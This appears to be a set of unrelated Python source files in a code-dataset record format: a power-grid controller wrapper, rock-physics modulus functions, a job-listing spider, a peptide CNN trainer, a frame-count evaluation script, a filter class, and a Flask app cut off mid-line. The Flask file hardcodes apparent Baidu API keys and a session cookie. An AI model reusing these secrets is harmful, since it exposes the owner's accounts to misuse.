multiple entities so that the lpbcs could go on different pieces of hardware\n#these entity files are on the server (Leo)\nentitydict = dict()\nentitydict[0] = 'lpbc_1.ent'\nentitydict[1] = 'lpbc_2.ent'\nentitydict[2] = 'lpbc_3.ent'\nentitydict[3] = 'lpbc_4.ent'\nentitydict[4] = 'lpbc_5.ent'\nentitydict[5] = 'lpbc_6.ent'\n\n\"Make sure phases are in consecutive order in config. Voltage first, then current. i.e., L1, L2, I1, I2\"\n'''NOTE: CHANGED PMUS TO CONFIGURE TO CIL TESTING BECAUSE COULD NOT FIGURE OUT HOW TO GET THE PMUS WITHOUT ERROR'''\n#pmu123Channels = np.asarray(['uPMU_123/L1','uPMU_123/L2','uPMU_123/L3','uPMU_4/C1','uPMU_4/C2','uPMU_4/C3'])\npmu123Channels = np.asarray([]) # DONE FOR CIL\n\n#HHERE this is a hack that Leo implemented to avoid the plug mapping\nif testNumber == '3.3' or testNumber == '9.3':\n pmu123PChannels = np.asarray(['uPMU_123P/L1','uPMU_123P/L2','uPMU_123P/L3'])\nelif testNumber == '8.1':\n pmu123PChannels = np.asarray(['uPMU_4/L1','uPMU_4/L2','uPMU_4/L3']) #these also have current channels, but dont need them\nelse:\n error('Not a valid test number yet (determine what pmu123PChannels should be and include it in the if statements)')\n\npmu4Channels = np.asarray(['uPMU_4/L1','uPMU_4/L2','uPMU_4/L3'])\nrefChannels = np.asarray(['uPMU_0/L1','uPMU_0/L2','uPMU_0/L3','uPMU_0/C1','uPMU_0/C2','uPMU_0/C3'])\n\nnlpbc = len(lpbcidx)\n\n#cfg file is used to build each LPBC, this is a template that is modified below for each LPBC\ncfg_file_template = config_from_file('template.toml') #config_from_file defined in XBOSProcess\n\n#CILscaling = Sratio (below):\n# command given will get multiplied by [150] in switch matrix\n# then divided by 15,000 to give a value in kW internally in Flexlab OpalRT (I think)\n# Thus a VA command will be multiplied by 10 (10 = 150/15 = 150/(15000/1000))\n# Sratio divides the network kVA\n# Sratio=10 divides the networkkVAbase by 10, so when the PU power commands are multiplied by kVA base they will implicitly be divided by 10, which cancels out the factor of 10 that the switch matrix scaling contributes.\n\n# loop = asyncio.get_event_loop()\n\nrate = 10\nprint('rate ', rate)\n\nlpbcdict = dict()\nfor lpbcCounter, key in enumerate(lpbcidx):\n #kVbase = np.NaN #should get this from the SPBC so lpbcwrapper doesnt have to run feeder (which requires networkx)\n #kVAbase = subkVAbase #this should also come from SPBC, once it does you can take it out from here\n act_idxs = np.nonzero(acts_to_phase_dict[key])[0]\n nphases = len(act_idxs)\n actType = actType_dict[key]\n plug_to_phase_map = plug_to_phase_dict[key]\n plug_to_phase_idx = plug_to_phase_map[np.nonzero(plug_to_phase_map)]\n cfg = cfg_file_template\n # namespace is the account that controls permissions\n cfg['name'] = key\n cfg['entity'] = entitydict[lpbcCounter] #entity is like a key for each LPBC\n if actType == 'inverter':\n cfg['rate'] = rate\n cfg['local_channels'] = list(pmu123PChannels[pmu123P_plugs_dict[key]])\n #COMMENTED LINE BELOW FOR CIL TESTING\n #cfg['local_channels'] = list(np.concatenate([pmu123PChannels[pmu123P_plugs_dict[key]], pmu123Channels[3 + pmu123_plugs_dict[key]], pmu123Channels[pmu123_plugs_dict[key]]]))\n #takes voltage measurements from PMU123P, current from PMU123, voltage measurements from PMU123P\n cfg['reference_channels'] = list(refChannels[pmu0_plugs_dict[key]]) #assumes current and voltage plugs are connected the same way\n currentMeasExists = True\n '''\n COMMENTED OUT FOR CIL TESTING\n localSratio = inverterScaling\n '''\n localSratio = CILscaling\n\n elif actType == 'load':\n cfg['rate'] = rate\n cfg['local_channels'] = list(pmu4Channels[pmu4_plugs_dict[key]])\n cfg['reference_channels'] = list(refChannels[pmu0_plugs_dict[key]])\n currentMeasExists = False\n localSratio = loadScaling\n elif actType == 'modbus':\n cfg['rate'] = rate\n cfg['local_channels'] = list(pmu123PChannels[pmu123P_plugs_dict[key]])\n cfg['reference_channels'] = list(refChannels[pmu0_plugs_dict[key]]) #made these back into lists in case thats how gabes code expects it\n currentMeasExists = False\n localSratio = CILscaling\n else:\n error('actType Error')\n cfg['spbc'] = SPBCname\n timesteplength = cfg['rate']\n cfg['testcase'] = testcase #6/3/20 put this in so the wrapper plotter can use the name to save the plot for a given testcase\n\n #Zest Parameters (from LPBC)\n currentMeasExists = 0 #HHHERE delete this (?)-- set to 0 in order to run Zest in CIL test\n localVratio = 1\n\n # Zeffk_init_mult = .5\n # Zeffk_init_mult = 2\n\n config = configparser.ConfigParser()\n # config.read('KM_Zest_params.cfg', encoding='utf-8-sig')\n config.read('KM_Zest_params.cfg')\n Zeffk_init_mult = float(config.get('parameters','initParam'))\n print('YYYYYYYYYYYYYYYYY Zeffk_init_mult ', Zeffk_init_mult)\n print('YYYYYYYYYYYYYYYYY type(Zeffk_init_mult) ', type(Zeffk_init_mult))\n\n # lpbcdict[key] = Zestwrapper(cfg, key, testcase, nphases, act_idxs, actType, plug_to_phase_idx, timesteplength, currentMeasExists, kVbase, kVAbase, localSratio, localVratio, ORT_max_kVA, VmagScaling, Zeffk_init_mult, loop) #Every LPBC will have its own step that it calls on its own\n lpbcdict[key] = Zestwrapper(cfg, key, testcase, nphases, act_idxs, actType, plug_to_phase_idx, timesteplength, currentMeasExists, kVbase, kVAbase, localSratio, localVratio, ORT_max_kVA, VmagScaling, Zeffk_init_mult) #Every LPBC will have its own step that it calls on its own\n # lpbcdict[key] = Zestwrapper(cfg, key, testcase, nphases, act_idxs, actType, plug_to_phase_idx, timesteplength, currentMeasExists, kVbase, kVAbase, localSratio, localVratio, ORT_max_kVA, VmagScaling) #Every LPBC will have its own step that it calls on its own\n #key is busId, which is the performance node for the LPBC (not necessarily the actuation node)\n\n# loop.run_forever()\n\nrun_loop() #defined in XBOSProcess\n\n\n\n\n'''\nfrom: https://github.com/gtfierro/energise-implementation/blob/master/LPBC/lpbc-example.py\nConfiguration:\n- `namespace`: do not change\n- `wavemq`: address of local wavemq agent\n- `name`: name of the LPBC controller. **This needs to be unique**\n- `entity`: the name of the local file constituting the 'identity' of this process.\n The entity file is what gives this process the permission to interact with other\n resources. File is created by `create_lpbc.sh`\n- `spbc`: the name of the SPBC this LPBC is subscribed to for phasor targets\n- `local_channels`: a list of URIs representing the phasor channels the LPBC\n subscribes to as the local measurement phasors\n- `reference_channels`: a list of URIs representing the phasor channels the LPBC\n subscribes to as reference phasors\n- `rate`: how many seconds between executions of the LPBC (can be fractional, e.g. 0.5)\n'''\n\n\n\n'''\nmy note of how Gabe's lpbcprocess and xbosprocess code works:\nlpbcwrapper is an LPBCProcess which is an XBOSProcess https://github.com/gtfierro/xboswave/blob/master/python/pyxbos/pyxbos/process.py\nWhich uses the asyncio python library and has a function call_periodic which calls trigger\nLPBCprocess has trigger which calls do_trigger which calls step with local_phasors, reference_phasors and phasor_targets\nProgram runs until program is closed in terminal by the user (so it will keep trying to send commands after the simulation ends)\n\nLPBC process\nbuilt in:\nSubscribing to reference PMU and local PMU (Local PMU shouldnt be a subscription, it should be locally available HERE)\nSubscribing to SPBC target\ncall_periodic, which runs the step function every self.rate seconds.\nThe second and third inputs (local and ref phasors) of step (within lpbc wrapper) are C37 frames\nhttps://github.com/gtfierro/xboswave/blob/master/python/examples/energise/lpbc.py\n(example code is missing reference phasors)\n\n\nfrom: https://github.com/gtfierro/energise-implementation/blob/master/LPBC/lpbc-example.py\n \"\"\"\n Step is called every 'rate' seconds with the following data:\n - local_phasors: a list of lists of phasor data, corresponding to the\n 'local_channels' given in the LPBC configuration. The phasor data will\n contain *all* phasor data received by the LPBC since the last time the\n 'step' function was run. The outer list of local phasor channels is ordered\n the same as the 'local_channels' configuration variable.\n If 'local_channels=[\"L1\",\"L2\"]', then 'local_phasors' will look like\n [\n # data for L1\n [\n {\n \"time\": \"1559231114799996800\",\n \"angle\": 193.30149788923268,\n \"magnitude\": 0.038565948605537415\n },\n {\n \"time\": \"1559231114899996400\",\n \"angle\": 195.50249902851263,\n \"magnitude\": 0.042079225182533264\n }\n ],\n # data for L2\n [\n {\n \"time\": \"1559231114799996800\",\n \"angle\": 193.30149788923268,\n \"magnitude\": 0.038565948605537415\n },\n {\n \"time\": \"1559231114899996400\",\n \"angle\": 195.50249902851263,\n \"magnitude\": 0.042079225182533264\n }\n ],\n ]\n - reference_phasors: a list of lists of phasor data, corresponding to the\n 'reference_channels' given in the LPBC configuration. The phasor data will\n contain *all* phasor data received by the LPBC since the last time the\n 'step' function was run. The outer list of reference phasor channels is ordered\n the same as the 'reference_channels' configuration variable.\n The structure of the 'reference_phasors' is the same structure as 'local_phasors' above.\n - phasor_target: is the most recently received phasor target given by the SPBC.\n The phasor target key is an array of the targets for each phase.\n It is structured as follows:\n {\n 'time': \"1559231114799996800\", # SPBC time in nanoseconds\n 'phasor_targets': [\n {\n 'nodeID': ,\n 'channelName': 'L1',\n 'angle': 196.123,\n 'magnitude': 10.2,\n 'kvbase': {'value': 10},\n },\n {\n 'nodeID': ,\n 'channelName': 'L2',\n 'angle': 196.123,\n 'magnitude': 10.2,\n 'kvbase': {'value': 10},\n },\n ]\n }\n \"\"\"\n'''\n","sub_path":"LPBC/KM_Zestwrapper_CIL.py","file_name":"KM_Zestwrapper_CIL.py","file_ext":"py","file_size_in_byte":135466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"285297437","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n\nimport numpy as np\nfrom scipy.optimize import leastsq\nfrom scipy.optimize import fsolve\nimport matplotlib.pyplot as plt\n#计算干岩石的体变模量和切变模量\n\"\"\"lee及Pride提出的固结砂岩弹性模量计算法发:Kd = Kma*(1-φ)/(1+α*φ)、μd = μma*(1-φ)/(1+1.5α*φ)\n其中Kd和μd分别代表干岩石骨架的体变模量和切变模量;Kma和μma分别代表颗粒的体变模量和切变模量;φ、α是固结参数,其中前者\n是孔隙度,而后者表示的是颗粒之间的固结程度。\nlee于2006年提出改进公式:\nμd = μma*(1-φ)/(1+γ*α*φ),且γ=(1+2α)/(1+α)\n这样我们只需要求出φ的值就可以求出干岩石的体变模量Kd和切变模量μd.\n\"\"\"\n#计算干岩石体变模量,其中kma为岩石颗粒体积模量,por为岩石孔隙度,alpha为固结参数。\ndef cal_bulk_modulus(p,alpha):\n kma,por = p\n return kma*(1-por)/(1+alpha*por)\n\n#计算干岩石切变模量,其中p为待求系数列表[gma,alpha],其中gma为岩石颗粒切变模量,por为岩石孔隙度,alpha为固结参数。\ndef cal_shear_modulus_Pride(p,por):\n gma,alpha = p\n return gma*(1-por)/(1+1.5*alpha*por)\n\ndef cal_shear_modulus_Lee(p,por):\n gma,alpha = p\n return gma*(1-por)/(1+((1+2*alpha)/(1+alpha))*alpha*por)\n\n#根据本地区孔隙度por和干岩石模量Md(可以是体模量也可以切变模量)反算岩石颗粒体变模量kma或切变模量gma和固结参数alpha\ndef error(p,por,Md,func):\n return func(p,por)-Md\n\n\n\n\"\"\"\n计算岩石颗粒的体变模量和切变模量\n\"\"\"\n#计算n种矿物岩石的颗粒Voigt上限值模量\ndef cal_Voigt(f,m):\n#其中f为n种矿物的体积百分含量需为numpy.array格式, 如f = np.array([0.1,0.2,0.7]),sum(f)需小于等于1.\n#m为n种矿物的模量需为numpy.array格式,如m = np.array([1,2,3]),可以是体变模量也可以是切变模量。\n if sum(f) !=1:\n raise(\"体积百分含量相加不为1\")\n else:\n if len(f) != len(m):\n raise(\"两数列长度不一致\")\n else:\n return sum(f*m)\n\n\n#计算n种矿物岩石的颗粒Reuss下限值模量\ndef cal_Reuss(f,m):\n#其中f为n种矿物的体积百分含量需为numpy.array格式, 如f = np.array([1,2,3]),sum(f)需小于等于1.\n#m为n种矿物的模量需为numpy.array格式,如m = np.array([1,2,3]),可以是体变模量也可以是切变模量。\n if sum(f) !=1:\n raise(\"体积百分含量相加不为1\")\n else:\n if len(f) != len(m):\n raise(\"两数列长度不一致\")\n else:\n return 1/sum(f/m)\n\n#计算n种矿物岩石的颗粒Hill平均值\ndef cal_Hill(f,m):\n return (cal_Reuss(f,m)+cal_Voigt(f,m))/2\n\n\n\"\"\"\nGassmann方程\n\"\"\"\ndef Gassmann_p(kd,gd,por,kma,kf,den):\n return sqrt((kd+4/3*gd+(1-kd/kma)**2/((1-kd/kma-por)/kma+por/kf))/den)\n\ndef Gassmann_s(gd,den):\n return sqrt(gd/den)\n\n\"\"\"\n自洽模型SCA\n\"\"\"\n\n\"\"\"\n微分等效介质模型\nFrom Berryman 1980\n\"\"\"\n#计算任意宽高比的P,Q值\n#对扁圆球体alpha<1,对扁长球体alpha>1\ndef theta(alpha):\n if alpha<1:\n \treturn alpha*(np.arccos(alpha) - alpha*np.sqrt(1.0 - alpha*alpha))/(1.0 - alpha*alpha)**(3.0/2.0)\n elif alpha == 1:\n raise(\"alpha不能等于1,请重新设置\")\n else:\n \treturn alpha*(alpha*np.sqrt(alpha*alpha-1)-np.arccosh(alpha))/(alpha*alpha-1.0)**(3.0/2.0)\n\ndef f(alpha, theta):\n return alpha*alpha*(3.0*theta - 2.0)/(1.0 - alpha*alpha)\n\ndef PQ(km, gm, ki, gi, alpha):\n A = gi/gm - 1.0\n B = (ki/km - gi/gm)/3.0\n R = gm/(km + (4.0/3.0)*gm)\n theta_ = theta(alpha)\n f_ = f(alpha,theta_)\n F1 = 1.0 + A*(1.5*(f_ + theta_) - R*(1.5*f_ + 2.5*theta_ - 4.0/3.0))\n F2 = 1.0 + A*(1.0 + 1.5*(f_ + theta_) - R*(1.5*f_ + 2.5*theta_)) + B*(3.0 - 4.0*R) + A*(A + 3.0*B)*(1.5 - 2.0*R)*(f_ + theta_ - R*(f_ - theta_ + 2.0*theta_*theta_))\n F3 = 1.0 + A*(1.0 - f_ - 1.5*theta_ + R*(f_ + theta_))\n F4 = 1.0 + (A/4.0)*(f_ + 3.0*theta_ - R*(f_ - theta_))\n F5 = A*(-f_ + R*(f_ + theta_ - 4.0/3.0)) + B*theta_*(3.0 - 4.0*R)\n F6 = 1.0 + A*(1.0 + f_ - R*(f_ + theta_)) + B*(1.0 - theta_)*(3.0 - 4.0*R)\n F7 = 2.0 + (A/4.0)*(3.0*f_ + 9.0*theta_ - R*(3.0*f_ + 5.0*theta_)) + B*theta_*(3.0 - 4.0*R)\n F8 = A*(1.0 - 2.0*R + (f_/2.0)*(R - 1.0) + (theta_/2.0)*(5.0*R - 3.0)) + B*(1.0 - theta_)*(3.0 - 4.0*R)\n F9 = A*((R - 1.0)*f_ - R*theta_) + B*theta_*(3.0 - 4.0*R)\n P = 3.0*F1/F2\n Q = 2.0/F3 + 1.0/F4 + (F4*F5 + F6*F7 - F8*F9)/(F2*F4)\n return P, Q\n\n#计算任意一点的两矿物混合岩石体积模量\ndef dem_K(km,gm,ki,gi,alpha,volume):\n p, q = PQ(km,gm,ki,gi,alpha)\n kd = ki+(km-ki)*(1-volume)**p\n return kd\n\n#计算两矿物混合的剪切模量\ndef dem_G(km,gm,ki,gi,alpha,volume):\n p, q = PQ(km,gm,ki,gi,alpha)\n gd = gi + (gm-gi)*(1-volume)**q\n return gd\n\n# def dem_m_K(km,gm,ki,gi,alpha,)\n\"\"\"\n主函数\n\"\"\"\n\nif __name__=='__main__':\n # mineral = np.array([[2.2,77]]*100)\n KM = np.array([[20]]*100)\n GM = np.array([[45]]*100)\n KI = np.array([[0.0]]*100)\n GI = np.array([[0.0]]*100)\n ALPHA = np.array([[0.01]]*100)\n perc1 = np.linspace(0,0.2,100)\n\n # perc2 = 1-perc1\n # perc = np.array([perc1,perc2]).transpose()\n # z1 = list(map(cal_Reuss,perc,mineral))\n # z2 = list(map(cal_Voigt,perc,mineral))\n K1 = list(map(dem_K,KM,GM,KI,GI,ALPHA,perc1))\n G1 = list(map(dem_G,KM,GM,KI,GI,ALPHA,perc1))\n K2 = list(map(dem_K,np.array(K1),np.array(G1),KI,GI,np.array([[0.15]]*100),perc1))\n G2 = list(map(dem_G,np.array(K1),np.array(G1),KI,GI,np.array([[0.15]]*100),perc1))\n K3 = list(map(dem_K,np.array(K2),np.array(G2),KI,GI,np.array([[0.8]]*100),perc1))\n G3 = list(map(dem_G,np.array(K2),np.array(G2),KI,GI,np.array([[0.8]]*100),perc1))\n fig1, = plt.plot(perc1,G1, 'b', label='K1')\n # fig2, = plt.plot(perc1,z1,'r',label=\"Reuss K\")\n # fig3, = plt.plot(perc1,z2,'g',label=\"Voigt K\")\n fig2, = plt.plot(perc1,G2,'r',label=\"K2\")\n fig3, = plt.plot(perc1,G3,'g',label=\"K3\")\n plt.legend(handles=[fig1,fig2,fig3]) # 显示图例\n plt.grid(\"on\")\n plt.show()","sub_path":"python/petrophysics.py","file_name":"petrophysics.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419546399","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a UpperRU spider created on top of the ATSSpider\n scrapy crawl upper_ru -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://job.upper.ru/vacancy?position=®ion=\"\n\n sample job url:\n http://job.upper.ru/vacancy/634095\n\"\"\"\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass UpperRU(ATSSpider):\n\n name = \"upper_ru\"\n\n def parse(self, response):\n selector = Selector(response)\n if not self.expected_job_count_set:\n job_count = selector.xpath(\n '//h2[@class=\"finded-total section\"]/text()').extract()\n if job_count:\n self.expected_job_count = job_count[0]\n\n jobs = selector.xpath('//ul[@id=\"yw0\"]/div[@class=\"items\"]/li')\n for job in jobs:\n url = job.xpath('./h4/a/@href').extract()\n if url:\n meta = {\n 'ref_num': job.xpath('./@id').extract(),\n 'title': job.xpath('./h4/a/text()').extract(),\n 'salary': job.xpath('./h4/text()').extract(),\n 'loc': job.xpath('./span[@class=\"city\"]/text()').extract(),\n }\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta,\n url=urljoin(response.url, url[0])\n )\n\n next_page_url = selector.xpath(\n '//ul[@id=\"yw1\"]/li[@class=\"next\"]/a/@href').extract()\n if next_page_url:\n yield Request(\n callback=self.parse,\n url=urljoin(response.url, next_page_url[0])\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_xpath('description', '//div[@class=\"desc section\"]')\n loader.add_xpath(\n 'company', '//div[@class=\"employer-logo\"]/h3/a/text()'\n )\n\n loader.add_value(\n 'referencenumber', response.meta.get('ref_num'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('baseSalary', response.meta.get('salary'))\n loader.add_value('location', response.meta.get('loc'))\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/upper_ru.py","file_name":"upper_ru.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"599699213","text":"import numpy as np\nimport pandas as pd\nfrom Protein_Encoding import PC_6\n\n# import data\nACP_data = PC_6('./data/new/train_test/4db_all_cdhit99_2124.fasta', length=50)\nnon_ACP_data = PC_6('./data/new/train_test/neg_all_2124.fasta', length=50)\n# turn the list into array\nACP_array= np.array(list(ACP_data.values()))\nnon_ACP_array = np.array(list(non_ACP_data.values()))\n\nfeatures = np.concatenate((non_ACP_array,ACP_array),axis=0)\nlabels = np.hstack((np.repeat(0, len(non_ACP_data)),np.repeat(1, len(ACP_data))))\n\n# shuffle numpy array\nidxs = np.arange(features.shape[0])\nnp.random.shuffle(idxs)\nx = features[idxs]\ny = labels[idxs]\n\n\n# training model\nimport tensorflow.keras\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.layers import Embedding\nfrom tensorflow.keras.layers import Input,Flatten,Masking,BatchNormalization\nfrom tensorflow.keras.layers import LSTM,Conv1D, MaxPool1D\nfrom tensorflow.keras import Model\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.regularizers import L1, L2\nimport os\n\n# model architechure\ndef t_m(train_data, train_label, model_name, path = None):\n input_ = Input(shape=(50,6))\n cnn = Conv1D(filters = 64, kernel_size = 20, strides = 1,activation = 'relu', padding=\"same\")(input_)\n norm = BatchNormalization()(cnn)\n MaxPool = MaxPool1D(pool_size=2, strides=1, padding='same')(norm)\n drop = Dropout(0.25)(MaxPool)\n \n cnn2 = Conv1D(filters = 32, kernel_size = 20, strides = 1,activation = 'relu', padding=\"same\")(drop)\n norm2 = BatchNormalization()(cnn2)\n MaxPool2 = MaxPool1D(pool_size=2, strides=1, padding='same')(norm2)\n drop = Dropout(0.25)(MaxPool2)\n \n cnn3 = Conv1D(filters = 8, kernel_size = 20, strides = 1,activation = 'relu', padding=\"same\")(drop)\n norm3 = BatchNormalization()(cnn3)\n MaxPool3 = MaxPool1D(pool_size=2, strides=1, padding='same')(norm3)\n drop = Dropout(0.25)(MaxPool3)\n\n Flat = Flatten()(drop)\n Den = Dense(128, activation = \"relu\")(Flat)\n drop = Dropout(0.5)(Den)\n result = Dense(1, activation = \"sigmoid\" ,kernel_regularizer= L2(0.01),activity_regularizer= L2(0.01))(drop)\n model = Model(inputs=input_,outputs=result)\n\n model.compile(optimizer=optimizers.Adam(lr=1e-4),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n e_s = tensorflow.keras.callbacks.EarlyStopping(monitor='val_loss',\n min_delta=0,\n patience=100,\n verbose=0, mode='min')\n best_weights_filepath = path+'/%s_best_weights.h5'%model_name\n saveBestModel = tensorflow.keras.callbacks.ModelCheckpoint(best_weights_filepath, \n monitor='val_loss', \n verbose=1, \n save_best_only=True, \n mode='auto')\n CSVLogger = tensorflow.keras.callbacks.CSVLogger(path+\"/%s_csvLogger.csv\"%model_name,separator=',', append=False)\n\n t_m=model.fit(train_data,train_label,shuffle=True,validation_split=0.1, \n epochs=500, batch_size=int(0.1*len(train_data)),callbacks=[saveBestModel,CSVLogger])\n return model,t_m\n\n\n# training model\nmodel, t_m = t_m(x,y,'PC_6_model_ACP4db_final', path='/home/yysun0116/ACPs/PC6/')\n\n\n\n# show the model training process\nfrom sklearn.metrics import accuracy_score,accuracy_score,f1_score,matthews_corrcoef,confusion_matrix,roc_curve,auc\nimport matplotlib.pyplot as plt\ndef show_train_history(train_history,train,validation):\n plt.plot(train_history.history[train])\n plt.plot(train_history.history[validation])\n plt.title('Train History')\n plt.ylabel(train)\n plt.xlabel('Epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n\nshow_train_history(t_m ,'accuracy','val_accuracy')\nshow_train_history(t_m ,'loss','val_loss')","sub_path":"code/ACPs_PC6_training.py","file_name":"ACPs_PC6_training.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"121210574","text":"import pandas as pd\nimport numpy as np\n\n# column headers of detection file\ncol_list = ['frameNumber', 'tracks_entering_interval', 'tracks_entering_total',\n 'tracks_exiting_interval','tracks_exiting_total',\n 'trackId', 'rectsSize', 'attribRectsSize', 'confClassId',\n 'countedAs', 'trackCrossingStatus', 'bordersSize', 'attribRectsX',\n 'attribRectsY', 'attribRectsWidth','attribRectsHeight',\n 'border_0_crossingStatus', 'border_0_areaChange',\n 'border_0_touchesBorder', 'border_0_percentArea']\n\n# path to detection file\nfile_path = '/Users/wendyzhang/Downloads/detections_bei_release_4.csv'\n\ndf = pd.read_csv(file_path, usecols=col_list, low_memory=False,\n error_bad_lines=False, index_col=False, dtype='unicode')\n\n# list of indices of repetitive row entries that need to be removed from\n# dataframe\nrows_to_remove = []\n\n# dictionary of pairs, indicating frames whose total entering count need to be\n# updated after removal (max value is selected for mutiple entries)\nenter_update = {}\nlast_frame = 'a'\nlast_enter = 0\nlast_exit = 0\n\n# determines rows to be deleted, and leaves rows to be updated after deletion\nfor index, row in df.iterrows():\n if row['frameNumber'] == last_frame:\n if row['tracks_exiting_total'] > last_exit:\n if row['tracks_entering_total'] >= last_enter:\n rows_to_remove.append(index - 1)\n else:\n enter_update[row['frameNumber']] = last_enter\n rows_to_remove.append(index - 1)\n last_frame = row['frameNumber']\n last_enter = row['tracks_entering_total']\n last_exit = row['tracks_exiting_total']\n else:\n rows_to_remove.append(index)\n if row['tracks_entering_total'] > last_enter:\n enter_update[row['frameNumber']] = row['tracks_entering_total']\n last_frame = row['frameNumber']\n last_enter = row['tracks_entering_total']\n last_exit = row['tracks_exiting_total']\n else:\n last_frame = row['frameNumber']\n last_enter = row['tracks_entering_total']\n last_exit = row['tracks_exiting_total']\n\n# contains unique frames only\nmodified_df = df.drop(rows_to_remove)\n\n# update entering count to maximum for specific frame\nfor key in enter_update:\n frame = key\n total_enter = enter_update[key]\n modified_df.loc[modified_df['frameNumber'] == frame,\n 'tracks_entering_total'] = total_enter\n\nnew_file = '/Users/wendyzhang/Documents/reduced_bei_release_4.csv'\n\nmodified_df.reset_index(inplace=True)\n\nmodified_df.to_csv(new_file)\n\ncounts = modified_df[[\"tracks_entering_total\", \"tracks_exiting_total\"]].to_numpy()\ntotal_counts_per_minute = counts[::1500,:]\ntotal_counts_per_minute = np.array([list(map(int, i)) for i in\n total_counts_per_minute])\n\nper_minute_counts = np.diff(total_counts_per_minute.transpose())\n\n# read file with ground truth data to dataframe\ngt_df = pd.read_csv('/Users/wendyzhang/Documents/bei_gt.csv',\n usecols=['Interval', 'Entering', 'Exiting'],\n low_memory=False)\n\nmy_counts = gt_df[['Entering', 'Exiting']].to_numpy()\n\ngt_counts_per_minute = my_counts.transpose()\n\ndf_counts = pd.DataFrame(np.array(per_minute_counts.transpose()),\n columns=['Entering', 'Exiting'])\n\ndf_counts.to_csv('/Users/wendyzhang/Documents/bei_release_4_counts.csv')\n\n# list of intervals by minute\nintervals = gt_df['Interval'].tolist()\n\ndf_counts.insert(0, 'Interval', intervals, True)\n\n# calculate average accuracy and error per minute\nmean_error_per_minute = np.mean(abs(gt_counts_per_minute - per_minute_counts) /\n np.add(gt_counts_per_minute,1e-15),axis = 1)\nmean_accuracy_per_minute = (1 - mean_error_per_minute) * 100\n\nprint(mean_error_per_minute)\nprint(mean_accuracy_per_minute)\n\n\n\n\n\n\n","sub_path":"per_minute_evaluation.py","file_name":"per_minute_evaluation.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"467995752","text":"import numpy as np\n\n\nclass SFilter:\n\tdef __init__(self):\n\t\tself.M = 2\n\t\tself.prevValues = np.zeros(self.M)\n\t\treturn\n\n\tdef getOutput(self, x):\n\t\t# Le aplica una Transferencia de H(z)=1/(1+gz^-M)\n\n\t\ty = np.ndarray(len(x))\n\t\tg = 0.5\n\t\ty_tot = np.append(self.prevValues, np.ndarray(len(x)))\n\n\t\tfor n in range(len(x)):\n\t\t\ty[n] = x[n] - g * y_tot[n] - 0.3 * y_tot[n + 1]\n\t\t\ty_tot[n+self.M] = y[n]\n\t\tfor i in range(self.M):\n\t\t\tself.prevValues[i] = y[len(y) - self.M + i]\n\t\t# Si tengo y=[y1,y2,y3,y4,...,y10] agarro los ultimos M valores\n\t\t# pej, si M = 3 entonces prevValues=[y8,y9,y10]\n\t\treturn y\n\n\tdef resetPrevValues(self):\n\t\tself.prevValues = np.zeros(self.M)\n\t\treturn","sub_path":"Código/SFilter.py","file_name":"SFilter.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"225771648","text":"# coding: utf-8\n\nimport os\nfrom io import BytesIO\nimport os,base64\nfrom leancloud import Query\nfrom leancloud import Object\nfrom flask import Flask\nfrom flask import redirect\nfrom flask import url_for\nfrom flask import g\nfrom flask import request\nfrom flask import send_from_directory\nfrom flask import flash,make_response,Response \nfrom flask import Markup\nfrom flask import render_template\nfrom werkzeug import Request\nimport leancloud\nimport requests\nimport json,random\nfrom views.todos import todos_view\nfrom views.users import users_view\nfrom aip import AipImageClassify\nfrom aip import AipFace\nfrom aip import AipBodyAnalysis\nfrom aip import AipOcr\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '11470546'\nAPI_KEY = 'hBYWy8rqaABMrkKCdFpNqOaj'\nSECRET_KEY = 'Eox3cFvvj2oV0I6OHqufUt4b7yfdYfyK '\nclient_ocr = AipOcr(APP_ID, API_KEY, SECRET_KEY)\nclient = AipImageClassify(APP_ID, API_KEY, SECRET_KEY)\nclient_face = AipFace(APP_ID, API_KEY, SECRET_KEY)\nclient_count = AipBodyAnalysis(APP_ID, API_KEY, SECRET_KEY)\napp = Flask(__name__)\napp.config.update(dict(PREFERRED_URL_SCHEME='https'))\ntry:\n app.secret_key = bytes(os.environ.get('SECRET_KEY'), 'utf-8')\nexcept TypeError:\n import sys\n sys.exit('未检测到密钥。请在 LeanCloud 控制台 > 云引擎 > 设置中新增一个名为 SECRET_KEY 的环境变量,再重试部署。')\nglobal cookie_data\ncookie_data = \"mmsess=s%3A70opOTJ-kIHh0aI_RT3RJEOgM5xBwSZr.r2sEk%2BF%2FWID8qnVZomBfKI7U2pmmhHRYgBnzZeAaeR0\"\nclass Todo(Object):\n pass\nclass HTTPMethodOverrideMiddleware(object):\n \"\"\"\n 使用中间件以接受标准 HTTP 方法\n 详见:https://gist.github.com/nervouna/47cf9b694842134c41f59d72bd18bd6c\n \"\"\"\n\n allowed_methods = frozenset(['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 